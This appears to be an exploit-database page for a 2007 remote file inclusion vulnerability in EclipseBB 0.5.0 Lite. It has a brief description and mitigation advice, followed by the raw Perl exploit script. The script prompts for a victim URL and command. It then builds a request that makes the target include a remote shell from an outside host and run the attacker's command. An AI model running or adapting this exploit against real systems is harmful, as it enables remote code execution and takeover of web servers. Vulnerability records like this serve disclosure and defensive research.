header-logo
Suggest Exploit
vendor:
EclipseBB
by:
xoron
5.5
CVSS
MEDIUM
Remote File Include
98
CWE
Product Name: EclipseBB
Affected Version From: EclipseBB 0.5.0 Lite
Affected Version To: EclipseBB 0.5.0 Lite
Patch Exists: NO
Related CWE:
CPE: a:eclipsebb:eclipsebb:0.5.0_lite
Metasploit:
Other Scripts:
Platforms Tested:
2007

EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit

This exploit targets EclipseBB 0.5.0 Lite script and takes advantage of a remote file inclusion vulnerability in the 'functions.php' file. By manipulating the 'phpbb_root_path' parameter in the 'functions.php' file, an attacker can include and execute arbitrary remote files.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of EclipseBB or apply the necessary security patches provided by the vendor. Additionally, ensure that user input is properly validated and sanitized to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

#(C) xoron
#
# [Bug name: EclipseBB 0.5.0 Lite (phpbb_root_path) Remote File Include Exploit
#
# [Script Name: EclipseBB 0.5.0 Lite
#
# [Wrong Codes:  require($phpbb_root_path . 'includes/bbcode.'.$phpEx);
#
$rfi = "functions.php?phpbb_root_path="; 
$path = "/includes/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) Mackrulz\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan xoron\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac.k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) xoron - xoron.biz\n$thx: pang0, chaos\n";
sleep 3;
system("start $acacaz");
}

# milw0rm.com [2007-01-28]

Navigation

Suggest Exploit

Services By CQR